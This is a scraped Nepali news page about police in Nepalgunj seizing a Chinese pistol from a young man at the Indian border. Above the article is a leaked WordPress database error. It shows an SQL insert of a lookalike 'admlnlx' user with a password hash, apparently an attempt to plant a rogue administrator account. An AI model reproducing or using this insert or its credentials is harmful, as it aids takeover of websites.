WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BoerT/BrcOcWKPbqnY.Fvf1lL0PQBz/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-22 23:53:55', '', 'admlnlx', 'admlnlx')
नेपालगन्ज,माघ २४-
भारतीय क्षेत्रबाट नेपालगन्जमा ल्याउँदै गरेको चाइनिज पिस्टल सहित ३ वटा गोली प्रहरीले बरामद गरेको छ । ‘ब्राउनसुगर सेवनकर्ता रहेको युवक संग पिस्टल फेला परेको हो’, बाँकेका प्रहरी प्रमुख एसपी टेक प्रसाद राईले भने, ‘नशालु पदार्थ सेवन गरेका कारण अभियुक्तबाट पूरै विवरण प्राप्त हुन सकेको छैन ।’
‘थोरै होसमा आएपछि युवकले आफ्नो नाम सद्दाफ पठान बताएको खुलेको छ’, एसपी राईले भने, ‘अं.२२ वर्षिय युवक संग पिस्टल किन र के प्रयोजनका लागि आएको हो भन्ने गहिराइका साथ अनुसन्धान अघि बढाइएको छ ।’
चेकजाँचका क्रममा जमुनाह प्रहरीले पक्राउ गरेको युवकलाई थप अनुसन्धानका लागि जिल्ला प्रहरी कार्यालय बाँकेमा राखिएको छ । अभियुक्तले आफु संग केहि थप ब्यक्तिहरुको समूह रहेको खुलाएको प्रहरीले जानकारी दिएको ।भारतमा विधान सभा निर्वाचन नजिकिँदै जाँदा हतियार फेला पर्नुलाई प्रहरीले गम्भीरताका साथ लिएको जनाएको छ । सिमाक्षेत्रमा चेकजाँच थप चुस्त पारिएको एसपी राईले जानकारी दिए ।